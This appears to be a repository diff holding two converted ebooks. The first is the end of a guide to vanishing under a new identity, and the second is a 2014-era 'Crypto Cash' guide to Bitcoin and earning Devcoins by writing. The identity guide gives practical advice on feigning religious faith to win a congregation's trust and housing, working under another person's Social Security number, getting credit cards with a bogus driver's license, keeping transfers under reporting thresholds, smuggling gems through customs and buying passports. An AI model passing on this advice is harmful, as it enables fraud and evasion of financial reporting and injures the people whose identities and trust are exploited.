the unique features of their doctrine. Pretend to +swallow their "line" completely. +If they have an "alter call" - join in the procession. Get down +on your knees. After some solemn prayer they’ll ask you to +stay to receive some literature and have a chat. Tell them +that your Grandmother was a Baptist. Ask them where you +can buy a bible (they’ll probably give you one free!). +If they mention a Christian bookstore, be sure to visit it and +spend some money. Tell the clerk that you are new in town +and a "new Christian". Buy any book(s) they might +recommend. Study them and learn the lingo. +The next week return to the same church and ask to become +a member after the service. If they don’t offer a church +membership card, ask for one. No matter how ridiculous +their beliefs sound to you, agree with them and listen to their +explanations with rapt attention. Ask the obvious questions +without challenging them in any way. +Bond with them as best as you can without being too +obvious. After a few encounters they will fall in love with you +and think you’re a wonderful person. Chances are some +fellow church member will invite you over to their house for +"fellowship." When they ask about your family tell them that +your parents are "lost in the darkness". +If you have a hard luck story (maybe you were on drugs or +were forced to join a satanic gang) that ends with you being +saved by Jesus - they will eat it up! Remember, most rational +people reject this narrow-minded theology, but you’re +different. You understand them and agree completely with +their beliefs. +Here’s the secret about this tactic: From then on your fellow +church members will tell others that you’re "nice" because +you believe as they do, not because they really think that +you’re all that nice. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 320 - +Reproduction in any form is prohibited without written permission. + +Attend church social activities. Find someone particularly +friendly and ask them to refer you to an apartment where +you plan to live until you can afford to buy a place of your +own. Tell them that you don’t want one of those sinful +apartment complexes. We all know about all the sinful +activity going on there and you, being a good Christian, want +none of that. +You want a nice clean "Christian" place. If they don’t know +any "born again" apartment owners, they’ll call around until +they find something for you. With a little luck this church +gambit may just land you a nice apartment with a landlord +who will be so happy to get a clean-living religious tenant +that he’ll ask very few questions. +Be generous with the tithing and other contributions if you +can afford to. The preacher will always have something nice +to say about anyone that forks over cash for the church +"building fund". Most of these guys are as profit oriented as +your average used car dealer! +Some Final Random Thoughts +During the San Francisco earthquake a local news station +was filming a burning building. When they swung the camera +around to show the crowd, about a dozen men broke from +the crowd and ran. They were all probably wanted by the +police (or their ex-wives!) Stay away from cameras. +Don’t do any unnecessary driving as it exposes you to the +possibility of a traffic stop by the police. Be aware that for the +first six months or so your new identity will be rather fragile +and might not stand up to close scrutiny. As time passes +your persona will "firm up" as you build a real history in your +new name. After a year - you are the new you. +During a recent interview the director of the FBI revealed +that most fugitives get caught during the first 90 days but +those who manage to live under a new identity for a full year +are seldom found. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 321 - +Reproduction in any form is prohibited without written permission. + +This all may sound like a very demanding and difficult +project. And in some ways it is. But hidden in the midst of all +this planning and worry is a golden opportunity to start all +over. There are a thousand ways to screw up a life so I can +only imagine what happened to your original identity. But +now you have what others dream of - a real chance to live +out your fantasies. +Seize the chance, as it may be the greatest turning point of +your life. It strange how some identity-changers go on to live +happy and successful lives while others never get it right and +spend their nights tossing and turning in the fear that "Big +Brother" will soon appear. +The most valuable thing I can think of to say at this point is +that IT CAN BE DONE! Don’t let anyone tell you otherwise. +If you presently have an established career, relocating under +a new name can be a daunting prospect. One identity- +changer was a Registered Nurse. To escape her abusive +and unrelenting ex she changed her identity and relocated to +a distant city. +Problem was she was in a licensed profession. Her answer +was to go back to school at age 42. She breezed through the +courses and challenged many others. Instead of taking three +years, she did the whole thing in half that time and was +licensed under her new name. Now she enjoys a good +salary and a solid career, the one she loves. +One recent identity-changer asked that we pass along this +little tip. He and his wife were planning on starting anew in +the US after leaving their east European home. They +obtained US tourist visas but were shocked to learn that they +were only allowed to take about $500 each with them in +cash. That’s hardly enough to start a new life. +To get around this little problem, they slowly liquidated their +possessions until they had a nest egg of around $80,000. +Through friends they were able to locate a diamond +merchant who sold them a nice 14-carat Russian diamond of +very high quality for cash. They then smuggled the gem into +the US in the wife’s vagina. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 322 - +Reproduction in any form is prohibited without written permission. + +After arrival, the bauble was sold for $60,000 in cold hard US +cash that allowed them to successfully launch their new +lives. (The diamond merchant back home wasn’t all that +honest it would appear!) +A diamond will allow you to concentrate an enormous +amount of wealth into a very small space and is also highly +liquid anywhere in the world. Others have done the same +thing with small but valuable antiques (those little wooden +Russian dolls have been used by Russians) that can be +easily hidden in your underwear. +It’s often hard to keep employment as the social security +withholdings are reported on a quarterly basis. Many wanted +criminals find that they are forced to change jobs every three +or four months to stay ahead of the dreaded letter from the +social security people advising their employer that one of +their employees has two jobs, one in Oregon and the other +in Florida! One common strategy is to work for a temp +service. You use someone else’s SSN and an assumed +identity. +These outfits have so many people going through their +revolving door that they seldom do much investigating. You +can work for at least several months. Move around from +office to office so no one gets too inquisitive. But I would ask +you not to use this ploy because it gets the actual holder of +the social security number in trouble with the social security +people. It can take a year or more to get such a mess +straightened out! +Popeye the Sailor Man… +A freshly divorced friend wanted to get completely and +utterly lost. Let’s just say that he did not want to +communicate with his ex. On a whim he spent his last few +bucks on a one-way ticket to sunny Ft. Lauderdale, Florida. +There we took to wandering the many yacht marinas that dot +the coast. After a week he managed to find a position doing +some renovation work on a boat owned by a rich dentist who +lived up north. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 323 - +Reproduction in any form is prohibited without written permission. + +It was an ideal job for someone in need of anonymity. In one +fell swoop it provided him with a steady source of income +and a nice comfortable (and completely untraceable) place +to live. And even better, when the dentist would come down +for his thrice yearly sailing outing, my friend would "crew" for +him and spend two weeks sailing the Caribbean. When the +owner wasn't around he would tell women that the boat was +his. They were very impressed and responded accordingly. +Not a bad gig! Also, my friend would take the boat out for +daylong cruises, which he advertised, in the local paper. He +posed as the owner of the boat and charged his day +passengers hefty fees, which they were only too happy to +pay. +Then one night he hit the mother load. When my friend had a +few extra bucks in his pocket, he was known to spend a few +idle hours in a local topless dancing establishment. There he +met a foxy lady named Tiffany. He happened to be chatting +to Tiffany the night before one of his unauthorized cruises. +When he revealed his little scheme +Tiffany suddenly became quite interested. He told her that +he wasn’t much looking forward to spending the next day in +the company of several old businessmen. Tiffany said that +she would just love to take that cruise as she was sure a +good looking hooker like herself could do some serious +business with his passengers (presumably while cruising out +beyond the three mile limit where law enforcement doesn't +exist). +They put together a deal. Tiffany and a dancer friend would +go along for the cruise. They agreed to kick back one third of +the illicit money they made to my friend. +The next morning six paunchy businessmen came aboard. +Then the two girls showed up clad only in lovely (though +scant) bikinis. The girls were turning tricks before they even +cleared the port! In all, the two girls earned three hundred +each, which put two hundred in my friends hot little hand. +The girls were happy, my friend was happy and the +passengers were also happy. (in fact they were extremely +happy!) And to make things even better the passengers +provided my friend with a generous tip! +© Copyright 2011, Ariza Research, All rights reserved - ABP - 324 - +Reproduction in any form is prohibited without written permission. + +Today my friend owns his own 50-foot boat. His "Erotic Night +Cruises" are a big hit - and his wife? She’s still looking for +him! This entire story is true. Just thought you might find it +interesting. +How to Export Your Money Privately +There are many different ways to take your money with you +when you leave the good old USA. You could just go and get +yourself a bank draft or a cashier’s check. This approach is +OK provided each one is for less than $3,000 (bankers now +report all transactions over $3,000 to the government) +Many have used checks drawn on a money market account. +This leaves a trail behind but that trail dries up when the +money market account is closed. +Using a personal or company check would be very foolish as +it leaves behind a very traceable paper trail. Secured credit +cards are good. You can obtain one in the US, deposit a +sizeable sum into the secured account and then wander the +globe spending as you please. You can make purchases +freely or get cash from ATM machine worldwide. +It’s best if you can manage to get one in another name by +using a bogus drivers’ license. Or better yet get one from a +Caribbean bank supported by an "offshore" account that will +provide you with the ultimate in privacy/security. +Traveler’s Checks can be used for smaller sums (less than +$3,000 per purchase). Purchase too many at a time and you +can look forward to increased scrutiny. +One rather resourceful fella I know discovered a very clever +way around the currency export limitation. He bought a full- +fare first class return airline ticket to his overseas +destination. He then flew there using the first half of the +ticket. He then changed his plans, cancelled the return +portion of the ticket and requested a cash refund that the +airline was only too happy to provide (they tend to take very +good care of their first class customers!). This enabled him +to quietly export several thousand dollars in cold hard cash. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 325 - +Reproduction in any form is prohibited without written permission. + +Travel Warning Update: +Several weeks ago I was returning to the US after two weeks +in eastern Europe. When I cleared passport control I +overheard an ominous conversation. It seems that an +individual who had arrived on the same flight was being +detained. +His sin was a simple one. He had failed to file a tax return for +the two previous years. He had been living overseas and +didn’t feel the need to file. But today it seems that the reach +of the IRS now includes the entire planet! (We’re the only +country that still taxes it expatriate citizens) +I had been hearing rumors that the IRS was beginning to put +out lists of those who fail to file. My sources tell me that the +IRS creates a master list of names taken from school +records. They then remove those who have death +certificates on file. Next they remove those who filed returns +last year. What’s left is a list of people who are presumably +still alive and for whatever reason are not filing returns. +I knew the government was doing this but until now I wasn’t +sure how the information was being used. Be careful! Be +sure you’ve filed if you expect to enter this country through a +main entry point. +Another Warning Concerning Travel: +An old high school friend of mine is well, rather a paranoid +type. He has never trusted our federal government and +today is completely convinced that Washington is bent on +devouring our personal freedoms. +So when he planned to take a trip to Europe, he decided that +he would defy the US department of state by traveling on a +fake passport he purchased on the Internet. +He submitted an order with the firm that seemed to offer the +best quality product. Later that night the local cops kicked in +his front door! They even brought a dog and a DEA cop with +them! Of course they found nothing (except for a single copy +of the "Anarchists’ Handbook" which they confiscated in +violation of his constitutional rights). +© Copyright 2011, Ariza Research, All rights reserved - ABP - 326 - +Reproduction in any form is prohibited without written permission. + +What ever happened to our fourth amendment rights? It +would appear that in our "New World Order" the cops no +longer need to bother with those troublesome old search +warrants. +A word to the wise: some of the online fake passport +companies are, in reality, nothing more than sting operations +set up by law enforcement. And it would be a real tragedy if +an innocent person such as yourself should fall into their +trap, wouldn’t it? +Also, others are peddling stolen passports, which are even +more dangerous. If you really want to get a genuine passport +that can be used to travel the world unmolested, take a look +around Central America where several governments +(including Belize, Grenada, Dominica, Antigua and Barbuda) +will provide one for a fee. But be warned, the fee can be +steep (anywhere from $15,000 to $75,000 or more isn’t at all +unusual). +If you’re only concerned about handing your US passport +over to a terrorist should you be on a hijacked plane, you +might want to contact the nice folks at Scope International. +They will provide you with a very authentic looking +"camouflage" passport that appears to be issued by an ex- +country like Rhodesia, Zanzibar or British Honduras. +Since these countries no longer exist, their passports cannot +be used for general travel but are only useful in terrorist +situations. (But you should be aware that these phony +passports will only be of value with terrorists who are +ignorant on the subject of geography.) +Scope International is located in England and be contacted +at: +Scope International +P.O. Box 2286, Forestide House +Rowlands Castle, Hants, England P09 6EE +Phone: (01705) 631-751 +© Copyright 2011, Ariza Research, All rights reserved - ABP - 327 - +Reproduction in any form is prohibited without written permission. + +Some Oddball Travel Options: +Travel is always an interesting option (if you can afford the +fare). Here are some rather strange travel ideas. One might +be just the ticket you need: +You could do a Kayak tour of Canada +Ecosummer Expeditions +(604) 669-7741 +How about dog sledding in far away Greenland? +Borton Overseas +(800) 843-0602 +Some other Greenland tours +Arctic Adventure Aps +(45) (1) 37 12 33 +(Denmark) +Go sailing on a real Russian icebreaker +MIR Corporation +(800) 424-7289 +Visit nomadic and tribal people +Turtle Tours +(602) 488-3688 +Travel to Brazil and Venezuela +Wildlife Adventures +(800) 255-8735 +Ride across Alaska on a motorcycle +Alaska Motorcycle Tours +(800) 642-6877 +Drive across the Sahara Desert +Explo-Tours +(49) (89) 160-789 +Germany +Do a 15 week tour of Africa? +Himalayan Travel +(800) 225-2380 +© Copyright 2011, Ariza Research, All rights reserved - ABP - 328 - +Reproduction in any form is prohibited without written permission. + +Spend five months touring all of South America +Forum Travel International +(510) 671-2900 +Spend 37 days exploring Australia +Trans Continental Safaris +(61) (88) 423-469 +Australia +Go on a real safari in Africa? +Abercrombie & Kent +(800) 323-7308 +Touring Tanzania sounds kinda nice… +Borton Overseas +(800) 843-0602 +Float on down the Yangtze River in China +Steve Curry Expeditions +(801) 224-6797 +And now one final tactic. Once you’re established in your +new location - burn this report! If discovered by the wrong +person later on, it could make the finder wonder just what +you’ve been up to and you don’t need to face any +unnecessary questions now do you? +I hope all this has helped you to move on to a happier new +life. A lot of time and effort has gone into getting this +information into your hands. I can only hope you will take full +advantage of it. Best of luck! +Mail Drops/Remailers +These outfits offer various types of services. Most will +forward mail on to whatever address you say. Most will +receive a reasonable number of phone messages and place +them in your box and most will receive fax message for you. +Mail drops are all over the world. To find one in your new city +go to the library and look under "Mail" in the yellow pages for +that town. If you feel you have to stay in touch with anyone +back home do it through two mail drops. +One is in the city your friends think you live in which forwards +any mail received on to you in your real new home city. This +makes tracing you more difficult (but not impossible). +© Copyright 2011, Ariza Research, All rights reserved - ABP - 329 - +Reproduction in any form is prohibited without written permission. + +Unfortunately, companies are popping up that sell lists of +known mail drops to banks and credit card companies. Be +careful, as these drops are probably not all that private +anymore. The best mail drop is one that you arrange +privately. Maybe you know some kindly old lady down the +street who has little to do and would just love to make a little +extra bingo money. +Here’s a short list of available mail drop locations: +Mail & +Mail Box +Parcel Mail-Rite +Rentals +Services +595 3500 +4032 S. +Piedmont Parkdale +Lamar Blvd. +Ave Ave +Atlanta, GA Austin, TX Baltimore, +30308 78704 MD 21211 +(404)872- (512)442- (410)383- +2026 1188 0007 +The Mail Mail and Mail Boxes +Center More & Services +1400 E. 6427 W. +1601 W. 5th +Morehead Irving Park +Ave +St. Rd. +Charlotte, Chicago, IL Columbus, +NC 28204 60634 OH 43212 +(704)358- (312)282- (614)488- +3585 6060 1863 +The Mail +Mail Room Mail & More +Depot +2950 17366 601 N. +Holbrook St. Harper Ave Cotton St. +Denver, CO Detroit, MI El Paso, TX +80228 48212 79902 +(303)986- (313)871- (915)533- +3941 2240 6245 +The Mail Mail and The Mail +Room More Bag +5230 W. 1836 W. 3rd 1283 La +16th St. St. Brea Ave +© Copyright 2011, Ariza Research, All rights reserved - ABP - 330 - +Reproduction in any form is prohibited without written permission. + +Los +Indianapolis, Jacksonville, +Angeles, +IN 46224 FL 32209 +CA 90019 +(317)244- (904)247- (213)938- +0117 8614 0101 +Mail +The Mail +Mail Mart Alternatives +Room +Plus +6506 W. 1024 17th 461 W. 49th +Capitol Dr. Ave South St. +Milwaukee, Nashville, New York, +WI 53216 TN 37212 NY 10019 +(414)463- (615)329- (212)399- +6245 9520 0575 +© Copyright 2011, Ariza Research, All rights reserved - ABP - 331 - +Reproduction in any form is prohibited without written permission. diff --git a/Crypto_Cash_pdf.md b/Crypto_Cash_pdf.md new file mode 100644 index 0000000..abb1eae --- /dev/null +++ b/Crypto_Cash_pdf.md @@ -0,0 +1,567 @@ +# Crypto Cash + + +--- + +Crypto Cash +By ROBugatti +Disclaimer +You agree that by following this guide the author is not responsible for the success or failure. +You also agree that the author(s) are not responsible for any consequences resulting from using +the information herein. +The Author has strived to be as accurate and complete as possible in the creation of this report, +notwithstanding the fact that he does not warrant or represent at any time that the contents +within are 100% accurate due to the rapidly changing nature of the Internet as well as +other factors. +While all attempts have been made to verify information provided in this publication, the +Author assumes no responsibility for errors, omissions, or contrary interpretation of the subject +matter herein. Any perceived slights of specific persons, peoples, or organizations are +unintentional. +In practical advice books, like anything else in life, there are no guarantees of income made. +Readers are cautioned to reply on their own judgment about their individual circumstances to +act accordingly. +This report is not intended for use as a source of legal, business, accounting or financial advice. +All readers are advised to seek services of competent professionals in legal, business, +accounting, and finance field. +Distribution, transmission, republication, or resale +of this document is strictly prohibited. + +Introduction +If you haven’t heard about Bitcoin, then maybe it’s time you learned more about +it. +As a digital currency, it’s gaining in popularity and has been in the news a lot +recently. Just take a quick look at some of the places that accept Bitcoin for +payment: + WordPress – yes the favorite blogging platform of IM users everywhere +accepts Bitcoins. You can use them to buy upgrades such as ad-free, +custom designs, and other features on wordpress.com. + Etsy – kind of like eBay, Etsy is more crafty and local. And hundreds of +vendors accept Bitcoin for payment. + Namecheap – the best domain name registrar out there, and they take +Bitcoins for payment. + Overstock.com + TigerDirect.com + …and the list keeps growing +OK, so just do an internet search and you’ll find out everything you want to know +by doing a little reading. From what I can tell, Bitcoin is here and it’s here to stay. + +Profiting From Bitcoin +Let’s just get right down to it. You want to make money from Bitcoins, right? +That’s why you bought this report. +Well, let me tell you straight up that trying to deal in Bitcoins directly is going to +be hard. And expensive. About a year ago one Bitcoin was worth about $21. +Today (as of the time I’m writing this) one is worth $814. And as recently as +November 2013, you could have bought Bitcoins at the low, low price of about +$200 each. So 10 weeks later you just made 400% on your investment. Can you +see why they have become so popular? +In addition to Bitcoins, there are dozens of other cryptocurrencies on the market. +Bitcoin is the first and most popular, but the other most popular ones (in order of +market capitalization) are Ripple, Litecoin, Peercoin, DogeCoin, Nxt, MasterCoin, +Namecoin, Quark, and ProtoShares. And that just rounds out the top 10. +Go to coinmarketcap.com and you can see the full list of 86 that they have +information for. The total market cap for all of these cryptocurrencies combined +is a whopping $13,182,548,476. Yeah, over $13 billion. +So how do you make money with cryptocoins? In general, there are two basic +ways to make money. You can mine them or you can invest/speculate. There are +other ways to earn as well, which is what I’m doing and how you can get in the +game. But first I’ll go over the basics of mining and investing. +Mining +First, you can mine coins. I won’t go into explicit detail, but mining is basically +using your own computing resources (called a rig) to attempt to solve a complex +algorithm which helps to verify and approve any transactions with that particular +currency. +Here is the description of Bitcoin mining from https://en.bitcoin.it/wiki/Mining: + +Mining is the process of adding transaction records to Bitcoin's public +ledger of past transactions. This ledger of past transactions is called +the block chain as it is a chain of blocks. The block chain serves to confirm +transactions to the rest of the network as having taken place. Bitcoin nodes +use the block chain to distinguish legitimate Bitcoin transactions from +attempts to re-spend coins that have already been spent elsewhere. +Mining is intentionally designed to be resource-intensive and difficult so +that the number of blocks found each day by miners remains steady. +Individual blocks must contain a proof of work to be considered valid. This +proof of work is verified by other Bitcoin nodes each time they receive a +block. Bitcoin uses the hashcash proof-of-work function. +The primary purpose of mining is to allow Bitcoin nodes to reach a secure, +tamper-resistant consensus. Mining is also the mechanism used to +introduce Bitcoins into the system: Miners are paid any transaction fees as +well as a "subsidy" of newly created coins. This both serves the purpose of +disseminating new coins in a decentralized manner as well as motivating +people to provide security for the system. +Bitcoin mining is so called because it resembles the mining of other +commodities: it requires exertion and it slowly makes new currency +available at a rate that resembles the rate at which commodities like gold +are mined from the ground. +If you keep reading on that page, you’ll see the different ways that you can mine +Bitcoins. The problem today is that in order to mine them profitably, you need +very powerful and expensive hardware (see ASIC mining) that can cost five +figures. Most of us don’t have the kind of cash or technical know-how to set that +up. +The next most popular cryptocoin to mine is Litecoin. Right now one Litecoin +(LTC) is going for around $21. These are much easier to mine. While typical +mining rigs use CPU power to mine, you are limited to usually just the one CPU in + +a typical computer. That’s why recently people have been switching to GPUs to +mine. +GPU (graphics processing unit) is the CPU of a graphics card. What GPU miners do +is focus all of their processing power to the GPU because they can install multiple +graphics cards on one motherboard so that they can mine much faster. And the +more computing power you have, the better chance you have of solving the +algorithm. +I was actually going to get into GPU mining, trying to mine Litecoin, by building my +own LTC mining rig. The problem I ran into was that the graphic cards themselves +are very hard to come by. And even if they are available, they are ridiculously +expensive. +I don’t think that mining is the cause of the video card scarcity (people do love +their computer games and high-end graphics you know), but due to the recent +popularity of mining with GPUs, it’s now much harder to even find the right +hardware. +The cost to build a LTC mining rig isn’t terrible. I was pricing one out by buying +each piece individually (the motherboard, CPU, memory, graphic cards, etc.) and +it came to around $1200. Not too bad really for a moderately high-end computer. +I could always use it to play the latest PC games or sell it to someone who wants +to. +And since I could not get the best graphics cards (I think the ones I priced were +still around $350 each), my hash rate (a measure of how much power I’m using to +compute) wasn’t top of the line. At my proposed hash rate and power +consumption, I think that I could have made about $20 per day mining Litecoins. +That might seem awesome at first, but that $20 depends on a lot of things, +especially the price of Litecoin. If it drops or crashes, then that $20 could go +down to $10 or even $5. Best case scenario would be about 2.5 months to get my +investment back, then the rest is profit. + +But that’s a lot of work, and you have to be somewhat of a techie to get it all +setup correctly. Plus, you really have to join a mining pool so that you are joining +forces with other miners. I could write an entire book on mining and pools and +GPUs and ASIC mining, but that’s not why you bought this report, so I’ll move on. +Investing +Plain and simple, you can buy cryptocoins now and hold on to them, hoping their +value will rise when you can sell them for a profit. +It’s the same as investing in gold, silver, stocks, bonds, etc. Buy low, sell high. +On the technical side, this is a much easier way to get into cryptocurrencies. But +you still have to jump through a few loops. +First of all, you need a way to pay for the cryptocoins. You do this by signing up +with a bitcoin wallet and platform site where you can use USD (and possibly other +currencies, but since I’m in the US I’ll only talk about doing this with USD) to buy +and sell Bitcoins. +I use Coinbase. You sign up with Coinbase and connect your bank account so you +can fund your account. Once you have money in your Coinbase account, you can +use this to buy Bitcoins. +Now, they only deal in Bitcoins, but that is fine. I know I talked about other +cryptocurrencies earlier, like Litecoin, but the grand-daddy of them all is Bitcoin +and honestly if you’re going to use any cryptocoin like currency, it will probably be +Bitcoin anyway. You may buy/sell/earn other cryptos, but you will eventually +trade them into Bitcoins so you can use them. +Once you buy Bitcoins, you can then use them in one of the many exchanges to +buy other cryptocoins. BTC is like the USD of the world. You can trade almost any +currency to/from Bitcoins. +I’ll give you a quick example to clarify. + +Joe wants to buy Litecoins. At around $21 each, he feels that the price is +good and the long term potential for profit is high. He has read where LTC +might reach $100 by the end of 2014. +Joe opens an account at Coinbase. He verifies his bank account and +deposits $800 into his Coinbase account. +Joe then uses Coinbase to buy Bitcoins directly at their current buy price. +Since right now it is exactly $800.00, he gets exactly one BTC. +Joe then opens an account with Cryptsy, a cryptocurrency exchange. +Within Cryptsy, Joe creates a new deposit address. This is a long +alphanumeric string like 17jUWvAWa79boxmgdnEtf4JLv4CBUW8b3D. +Joe then goes back to Coinbase and chooses to Send Money. He copies the +deposit address from Cryptsy, the amount he wants to send (in this case +1.00 BTC) and clicks to send the money. +After a period of authorization for this transaction (could be 15 minutes or +longer) he goes back to Cryptsy and sees that he now has a balance of 1.00 +BTC. +Within Cryptsy, he goes to the LTC/BTC market to buy LTC. +The price per LTC is currently 0.02629412 so he can buy 37.95 LTC with his +1.00 BTC. This includes a 0.20% fee (in BTC). I figured this out just by +putting in different amounts for how much LTC I wanted to buy until my net +total was just barely under 1.00, since that is all I had to invest. +Joe clicks on Submit Buy Order and he buys 37.95 LTC. At around $21 that +is worth $796.95, so he paid around $3 in fees. Not too bad. +At this point you have a balance of 37.95 LTC at Cryptsy. You can use this to buy +any cryptocurrency that trades on Cryptsy. +You now have two options: leave the balance at Cryptsy, or withdraw the balance +to a local wallet. + +Wallets +When dealing with cryptocurrencies, there are two types of wallets: online and +offline. +Online wallets like Coinbase let you store your BTC or USD with them so that you +have it available to trade using the cryptocurrency exchanges. +Online exchanges will store your cryptocoins as well, so that you can buy/sell at +will without having to worry about sending or receiving coins in order to make +transactions. +If you do a lot of trading, it’s not unreasonable to keep these online balances filled +to whatever amount you need to trade. It saves time and you don’t have to +worry about constantly funding your account. +If you want to make a one-time trade to hold on to some cryptocoins for the +future in hopes that the price will rise (kind of like investing in gold or silver coins, +or even stocks for that matter) then you might want to store those coins in an +offline wallet on your PC (or even off your PC, i.e. on a flash drive or even paper). +All cryptocoins have a wallet associated with them. Well, at least I think so. For +Bitcoin, the wallet is what allows you to transact with other users. It gives you +ownership of a Bitcoin balance so that you can send and receive bitcoins. Just like +email, all wallets can interoperate with each other. +Once you install the wallet (there is a different program/wallet for each +cryptocoin which you need to install separately), you can generate an address to +send or receive cryptocoins. +So now, you can (within Coinbase, Cryptsy, or other online wallet or exchange) +send whatever coins you have to an address that you generate with your local +wallet. Once that transaction gets processed, the coins are now held in your local +wallet. + +Many people do this as a security measure so that if an exchange crashes, or +worst case goes out of business or gets shut down for some reason, you won’t +lose whatever coins you had stored with them. +Personally, if I’m in this for the long term, I would recommend keeping all of your +cryptocoins offline. In fact, I even copy the data file from my PC to a flash drive +(or even multiple flash drives for security, or in case one fails) and then delete the +data file on my PC. +Why do this? Well, if you get hacked, the hacker can steal that data file and get +ALL of the coins in that wallet. And if you’re dealing with thousands of dollars’ +worth of cryptocoins, even tens of thousands, then you probably want to make +sure your money is safe. It’s like a safe deposit box. +Let’s continue our example with Joe: +Joe just bought 37.95 LTC on Cryptsy and wants to store this offline in his +Litecoin wallet. +Joe goes to https://litecoin.org/ and downloads and installs the LTC wallet. +When Joe runs the wallet for the first time, it takes hours to sync, since it +needs to download all of the previous transaction blocks. Once this is done, +Joe is ready for the next step. +Joe generates a new address within the LTC wallet to receive coins. +Within Cryptsy, Joe chooses to withdraw his LTC to his local wallet. He does +this by going to his Account Balances, hovering over Litecoin, and choosing +Withdraw LTC. +Joe puts in 37.945 as the amount since there is a .005 LTC withdraw fee. +Joe then enters the withdraw address that he created from his offline LTC +wallet installed on his PC. After entering his password and captcha, he +processes the withdraw. + +Joe opens his LTC wallet on his PC and lets it run. Eventually it processes +his transaction and his offline wallet is now credited with 37.945 LTC. +OK, that may have been too long and drawn out for some of you, but I wanted to +go through the entire process, showing you everything that is involved when +you’re dealing with buying and selling cryptocurrencies. +Other Ways to Make Money with Cryptocoins +Now let’s get to the meat of this report. Hopefully you’ll be much better +informed on what is required of you to deal with cryptos, because it’s not always +simple for someone who has never done this before. +Other than mining or buying cryptocoins directly, there ARE other ways to make +money with crypto. +Faucets +A faucet in the alternate currency world is basically a website that gives you a +small amount of the coin for free, whether because of the advertising revenue +they have on the site, various clicks they get, or because they are interested in +promoting their crypto-currency & if someone has a stake in that crypto-currency +then they are more likely to promote it. +Personally, I stay away from them. I liken faucets to the “earn credits by surfing” +programs, or “complete surveys to earn points” programs. They just seem like +scams to me. Just take a quick look at most faucet sites. They are spammy, full of +ads, and my personal opinion is that they are a complete waste of time. +What free coins you get are probably worth a fraction of a cent, and if you want +to spend hours per day on the hundreds of faucet sites (or cryptocoin lottery +sites) trying to earn maybe a buck, then by all means go ahead. I’ve got better +things to do. + +I really can’t comment any more than that, and this is just my personal opinion +since I have not looked into it more, but my time is valuable and I’m certainly not +going to waste it on faucets. Do research and form your own opinion, though. +Cryptocurrency-Specific Ways to Earn +OK, that probably sounds a little vague. But if you look at the list of cryptocoins, +they all have different purposes. +For example, Ripple is actually an internet protocol for making financial +transactions. So it’s like PayPal, but it’s not controlled by any organization. As +HTTP is the protocol for displaying web pages, RTXP is the protocol for making +transactions on the internet. And the market cap for Ripple is over $2 billion. +They even have altcoins that serve different functions, such as: + Tickets – also called LotteryTickets, it gives random rewards for each block +solved + Sexcoin – an altcoin that can be used for adult websites and services + Craftcoin – used as portable in-game currency for Minecraft servers + Devcoin – to support open-source projects by programmers, hardware +developers, writers, musicians, painters, etc. worldwide +Ok, so pay attention to that last one. More specifically, because it supports +WRITERS. + +Earning Devcoins by Writing +OK, so sorry that it took so long to get to the real how-to of this report, but I think +it’s important to understand at least the basics of crypto and what you will need +to do to earn cryptocoins and then turn that into cold hard cash! +First of all, go here: http://devtome.com/doku.php?id=devcoin. +Download/install the Devcoin wallet. +Then, go here: http://devcoin.org/get-devcoin.html. +You’ll see a link for “earn Devcoins by writing”. Click on that. At the very top of +that page is a really good “getting started” link to learn more about how it works. +There are four steps you need to go through to get set up: +1. Get the Devcoin wallet +2. Request an account on Devtome and give them a sample of your writing +3. On your userpage, post your wallet address so you can get paid! +4. Write your articles +That’s it. +You can write fiction, non-fiction, poetry…whatever. They do have requirements +such as no plagiarism, erotica, scammy stuff, etc. And they want good formatting. +No crap! +I was even able to take a few articles that I posted on one of my websites and +repost them to my Devtome account for credit. I did provide a proper reference +to my site, which is even better for me! +What they don’t want is a bunch of outsourced garbage, poor formatting or +grammar, copying/pasting some PLR articles that you have, or anything else +where they think you are trying to game the system. +For Round 31 (see the devtome page for what that means), I wrote six articles. + +Two were copied right from one of my blogs. They don’t care as long as it is +YOUR work and you can reference it. I even had to edit those posts so the admins +could see that it was really mine. +One article was basically me rambling on about fantasy football . It ended up +being the longest of my articles, and it was fun to write. +One article was something I had posted on my Dropbox as fiction fodder. I had a +crazy dream one night and remembered most/all of it, and so the next morning I +put it all down on paper (i.e. Word) and saved it to my Dropbox in case I wanted +to use it for a short story at some point. Well, I did. +The last two articles were short stories (two or three pages each) that I wrote and +posted on fictionpress.com years ago. Again, I had to verify that they were +actually mine and I wasn’t stealing them from someone else, but once I did that I +posted the source as a reference and they were accepted. +How You Get Paid +Take a look at the Generation Share section here: +http://www.devtome.com/doku.php?id=earn_devcoins_by_writing +I won’t go into details (it’s all on the site) but in round 31 everyone got 144,810 +DVC per share. And at the prices at that point in time, each share was worth +about $61. +Devcoins are paid out each round to various groups. The admin gets a cut each +round. They give shares to people who do marketing. They give shares to +Devtome writers. They also have bounties and ratings. I’m not even sure what all +those entail as far as how you earn with them. All I’m concerned about is the +Devtome writers’ shares. +Go here: http://dvccountdown.blisteringdevelopers.com/ +That is a DVC countdown clock. It shows the shares earned per round and other +info. On the bottom you’ll see this: + +You’ll see for Devtome that there were a total of 512 shares allotted. So for +everyone that had articles during the last round posted and approved on +Devtome, you got a certain percentage of that 512 shares. +First of all, they look at word count. The more words, the more shares, plain and +simple. +But recently they have instituted a popularity index using Google Analytics. So if +your article on Devtome gets a lot of views and people stay on your page longer +than for other articles, that article is worth more. So if you write good stuff that +people want to read, you’ll get rewarded for it. +The takeaway here for me at least is that I want to post longer articles. First of all, +if people actually are reading the articles, then they will obviously take longer to +read my (longer) articles. At least longer than a short piece of flash fiction. And +so my popularity index rises. +They have the formula all broken down, but we don’t need to go into details here. +Just know that if you write crap, people will immediately see this and stop +reading, and you will get even less of a share, even if it’s a longer article. Garbage +in, garbage out. +So write high-quality, longer articles about interesting subjects and you’ll be fine. + +If you consider that I published only six articles, two of which were copied/pasted +from my blog, three of which were written years ago on another site (all proper +references sited of course), and only one was written in about 30 minutes as +more of a rambling, you’ll be shocked to see how much I earned for less than an +hour of work. +My username on Devtome is cryptowonk. On the countdown site referenced +above, you can put in my devtome username and round (31) to see how many +shares I got. Here’s a screenshot: +So you can see that I got 7.0 shares. Since each share was worth about $61 at the +time that the round was over, I made $427. Who else wants to make $427/hour +in their job? +Actually what I earned was 144,810 DVC per share x 7 shares = 1,013,670 DVC. +At this exact moment, one DVC is worth $0.00054, so that equates to $547. 